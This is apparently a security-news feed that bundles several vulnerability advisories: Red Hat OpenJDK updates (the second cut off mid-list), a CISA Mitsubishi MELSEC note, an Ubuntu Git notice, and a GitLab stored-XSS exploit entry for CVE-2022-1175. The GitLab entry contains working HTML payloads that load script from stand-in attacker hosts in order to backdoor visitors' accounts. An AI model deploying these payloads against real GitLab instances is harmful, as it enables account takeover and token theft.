Red Hat Security Advisory 2022-1491-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

`-----BEGIN PGP SIGNED MESSAGE-----   Hash: SHA256  =====================================================================   Red Hat Security Advisory  Synopsis: Important: java-1.8.0-openjdk security update   Advisory ID: RHSA-2022:1491-01   Product: Red Hat Enterprise Linux   Advisory URL: https://access.redhat.com/errata/RHSA-2022:1491   Issue date: 2022-04-25   CVE Names: CVE-2022-21426 CVE-2022-21434 CVE-2022-21443   CVE-2022-21476 CVE-2022-21496   =====================================================================  1. Summary:  An update for java-1.8.0-openjdk is now available for Red Hat Enterprise   Linux 8.  Red Hat Product Security has rated this update as having a security impact   of Important. A Common Vulnerability Scoring System (CVSS) base score,   which gives a detailed severity rating, is available for each vulnerability   from the CVE link(s) in the References section.  2. Relevant releases/architectures:  Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64   Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64  3. Description:  The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime   Environment and the OpenJDK 8 Java Software Development Kit.  Security Fix(es):  * OpenJDK: Defective secure validation in Apache Santuario (Libraries,   8278008) (CVE-2022-21476)  * OpenJDK: Unbounded memory allocation when compiling crafted XPath   expressions (JAXP, 8270504) (CVE-2022-21426)  * OpenJDK: Improper object-to-string conversion in   AnnotationInvocationHandler (Libraries, 8277672) (CVE-2022-21434)  * OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   (CVE-2022-21443)  * OpenJDK: URI parsing inconsistencies (JNDI, 8278972) (CVE-2022-21496)  For more details about the security issue(s), including the impact, a CVSS   score, acknowledgments, and other related information, refer to the CVE   page(s) listed in the References section.  4. Solution:  For details on how to apply this update, which includes the changes   described in this advisory, refer to:  https://access.redhat.com/articles/11258  All running instances of OpenJDK Java must be restarted for this update to   take effect.  5. Bugs fixed (https://bugzilla.redhat.com/):  2075788 - CVE-2022-21426 OpenJDK: Unbounded memory allocation when compiling crafted XPath expressions (JAXP, 8270504)   2075793 - CVE-2022-21443 OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   2075836 - CVE-2022-21434 OpenJDK: Improper object-to-string conversion in AnnotationInvocationHandler (Libraries, 8277672)   2075842 - CVE-2022-21476 OpenJDK: Defective secure validation in Apache Santuario (Libraries, 8278008)   2075849 - CVE-2022-21496 OpenJDK: URI parsing inconsistencies (JNDI, 8278972)  6. Package List:  Red Hat Enterprise Linux AppStream (v. 8):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_5.src.rpm  aarch64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_5.aarch64.rpm  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el8_5.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el8_5.noarch.rpm  ppc64le:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_5.ppc64le.rpm  s390x:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_5.s390x.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_5.s390x.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_5.s390x.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_5.s390x.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_5.s390x.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_5.s390x.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_5.s390x.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_5.s390x.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_5.s390x.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_5.s390x.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_5.s390x.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_5.x86_64.rpm  Red Hat CodeReady Linux Builder (v. 8):  aarch64:   java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-demo-fastdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-demo-slowdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-devel-fastdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-devel-slowdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-fastdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-headless-fastdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-headless-slowdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-slowdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-src-fastdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm   java-1.8.0-openjdk-src-slowdebug-1.8.0.332.b09-1.el8_5.aarch64.rpm  ppc64le:   java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-demo-fastdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-demo-slowdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-devel-fastdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-devel-slowdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-fastdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-headless-fastdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-headless-slowdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-slowdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-src-fastdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm   java-1.8.0-openjdk-src-slowdebug-1.8.0.332.b09-1.el8_5.ppc64le.rpm  x86_64:   java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-demo-fastdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-demo-slowdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-devel-fastdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-devel-slowdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-fastdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-headless-fastdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-headless-slowdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-slowdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-src-fastdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm   java-1.8.0-openjdk-src-slowdebug-1.8.0.332.b09-1.el8_5.x86_64.rpm  These packages are GPG signed by Red Hat for security. Our key and   details on how to verify the signature are available from   https://access.redhat.com/security/team/key/  7. References:  https://access.redhat.com/security/cve/CVE-2022-21426   https://access.redhat.com/security/cve/CVE-2022-21434   https://access.redhat.com/security/cve/CVE-2022-21443   https://access.redhat.com/security/cve/CVE-2022-21476   https://access.redhat.com/security/cve/CVE-2022-21496   https://access.redhat.com/security/updates/classification/#important  8. Contact:  The Red Hat security contact is <secalert@redhat.com>. More contact   details at https://access.redhat.com/security/team/contact/  Copyright 2022 Red Hat, Inc.   -----BEGIN PGP SIGNATURE-----   Version: GnuPG v1  iQIVAwUBYmbJi9zjgjWX9erEAQiJFw//aHWpEtdVlArGK/D4EUJG8P7QKzMgLGYh   y6WHYvXmMjiwhl/1o7PXUzUXjmGkAQQ4bOOkyWndbc4DsBMwuz7/otmF64h0Ol5K   LMEiW1EZPkn8zaVzRJegL9y8GbP0jEg0MNFJ6SUtYS1fkYIxXc22LfFskzeNKxFy   vNfWIPx7lN1+jQgubTi0WKVcBnXjBwQ/ZloPQzzRanrW6QfM3K8a0C7X+DeJO5wR   lWGMYCkRZCKXxSCEWDv81pNwXy2S9SuV6Mo9VgW3TG+UfLkhIePA4yebDhnFQi/p   BizL9/b8UIb6CEgdNIj4csK49b7Ae8ABArhWSi1aAscQZNO9gAwgWGTKZAh7ZhQt   jEnaZpf9U/V+imLXyiqsknUQHH/vqIVYWTSnAwgYwNDDrPWtnHwBuRUh2MzE3cUY   CCHTneQ3GRYSm3hVlixf8L27uLh7ofad9vVHo/Jo33XM+o7dbC3/HGQasxWljNgY   j6aEKnNgtFTrLc4fARgKwC2j0qbZm9Nb5KXTmzdbtwgzFOGBlMnEmFWuDWncZ/Y/   el7MVYb/BiEGFhUH520mOPE+heeJYdRladjbgaq9+wu5zDyZ3K4CFIND81JPY1OT   X6QTIP8K0NGoAxOrhOOKQYDWi07I1AjCy86QPGIoMBaOW+RezxKjp3PDQovaNAAl   HNuIUczreHE=   =Kska   -----END PGP SIGNATURE-----   --   RHSA-announce mailing list   RHSA-announce@redhat.com   https://listman.redhat.com/mailman/listinfo/rhsa-announce  `

Red Hat Security Advisory 2022-1491-01

Gitlab versions 14.9 prior to 14.9.2, 14.8 prior to 14.8.5, and 14.7 prior to 14.7.7 suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: Gitlab Stored XSS# Date: 12/04/2022# Exploit Authors: Greenwolf & stacksmashing# Vendor Homepage: https://about.gitlab.com/# Software Link: https://about.gitlab.com/install# Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2# Tested on: Linux# CVE : CVE-2022-1175# References: https://github.com/Greenwolf/CVE-2022-1175Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor.Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>Standard script include also works depending on the sites CSP policy. This is more stealthy.<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>

Gitlab 14.9 Cross Site Scripting

This updated advisory is a follow up to the advisory update titled ICSA-21-334-02 Mitsubishi Electric MELSEC and MELIPC Series (Update A) that was published January 27, 2022, to the ICS webpage on www.cisa.gov/uscert. This advisory contains mitigations for Uncontrolled Resource Consumption, Improper Handling of Length Parameter Inconsistency, and Improper Input Validation vulnerabilities in Mitsubishi Electric MELSEC and MELIPC Series software management platforms.

Mitsubishi Electric MELSEC and MELIPC Series (Update B)

Ubuntu Security Notice 5376-2 - USN-5376-1 fixed vulnerabilities in Git. This update provides the corresponding updates for Ubuntu 22.04 LTS. 俞晨东 discovered that Git incorrectly handled certain repository paths in platforms with multiple users support. An attacker could possibly use this issue to run arbitrary commands.

    ==========================================================================Ubuntu Security Notice USN-5376-2April 25, 2022git vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Git could be made to run arbitrary commands in platforms with multiple userssupport.Software Description:- git: fast, scalable, distributed revision control systemDetails:USN-5376-1 fixed vulnerabilities in Git. This update provides the correspondingupdates for Ubuntu 22.04 LTS.Original advisory details: 俞晨东 discovered that Git incorrectly handled certain repository paths in platforms with multiple users support. An attacker could possibly use this issue to run arbitrary commands.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  git                             1:2.34.1-1ubuntu1.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5376-2  https://ubuntu.com/security/notices/USN-5376-1  CVE-2022-24765Package Information:  https://launchpad.net/ubuntu/+source/git/1:2.34.1-1ubuntu1.1

Ubuntu Security Notice USN-5376-2

Red Hat Security Advisory 2022-1487-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

`-----BEGIN PGP SIGNED MESSAGE-----   Hash: SHA256  =====================================================================   Red Hat Security Advisory  Synopsis: Important: java-1.8.0-openjdk security, bug fix, and enhancement update   Advisory ID: RHSA-2022:1487-01   Product: Red Hat Enterprise Linux   Advisory URL: https://access.redhat.com/errata/RHSA-2022:1487   Issue date: 2022-04-25   CVE Names: CVE-2022-21426 CVE-2022-21434 CVE-2022-21443   CVE-2022-21476 CVE-2022-21496   =====================================================================  1. Summary:  An update for java-1.8.0-openjdk is now available for Red Hat Enterprise   Linux 7.  Red Hat Product Security has rated this update as having a security impact   of Important. A Common Vulnerability Scoring System (CVSS) base score,   which gives a detailed severity rating, is available for each vulnerability   from the CVE link(s) in the References section.  2. Relevant releases/architectures:  Red Hat Enterprise Linux Client (v. 7) - x86_64   Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64   Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64   Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64   Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64   Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64   Red Hat Enterprise Linux Workstation (v. 7) - x86_64   Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64  3. Description:  The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime   Environment and the OpenJDK 8 Java Software Development Kit.  Security Fix(es):  * OpenJDK: Defective secure validation in Apache Santuario (Libraries,   8278008) (CVE-2022-21476)  * OpenJDK: Unbounded memory allocation when compiling crafted XPath   expressions (JAXP, 8270504) (CVE-2022-21426)  * OpenJDK: Improper object-to-string conversion in   AnnotationInvocationHandler (Libraries, 8277672) (CVE-2022-21434)  * OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   (CVE-2022-21443)  * OpenJDK: URI parsing inconsistencies (JNDI, 8278972) (CVE-2022-21496)  For more details about the security issue(s), including the impact, a CVSS   score, acknowledgments, and other related information, refer to the CVE   page(s) listed in the References section.  4. Solution:  For details on how to apply this update, which includes the changes   described in this advisory, refer to:  https://access.redhat.com/articles/11258  All running instances of OpenJDK Java must be restarted for this update to   take effect.  5. Bugs fixed (https://bugzilla.redhat.com/):  2047529 - Prepare for the next quarterly OpenJDK upstream release (2022-04, 8u332) [rhel-7]   2075788 - CVE-2022-21426 OpenJDK: Unbounded memory allocation when compiling crafted XPath expressions (JAXP, 8270504)   2075793 - CVE-2022-21443 OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   2075836 - CVE-2022-21434 OpenJDK: Improper object-to-string conversion in AnnotationInvocationHandler (Libraries, 8277672)   2075842 - CVE-2022-21476 OpenJDK: Defective secure validation in Apache Santuario (Libraries, 8278008)   2075849 - CVE-2022-21496 OpenJDK: URI parsing inconsistencies (JNDI, 8278972)  6. Package List:  Red Hat Enterprise Linux Client (v. 7):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.src.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux Client Optional (v. 7):  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el7_9.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el7_9.noarch.rpm  x86_64:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux ComputeNode (v. 7):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.src.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux ComputeNode Optional (v. 7):  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el7_9.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el7_9.noarch.rpm  x86_64:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux Server (v. 7):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.src.rpm  ppc64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.ppc64.rpm  ppc64le:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.ppc64le.rpm  s390x:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.s390x.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux Server Optional (v. 7):  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el7_9.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el7_9.noarch.rpm  ppc64:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.ppc64.rpm  ppc64le:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.ppc64le.rpm  s390x:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.s390x.rpm  x86_64:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat 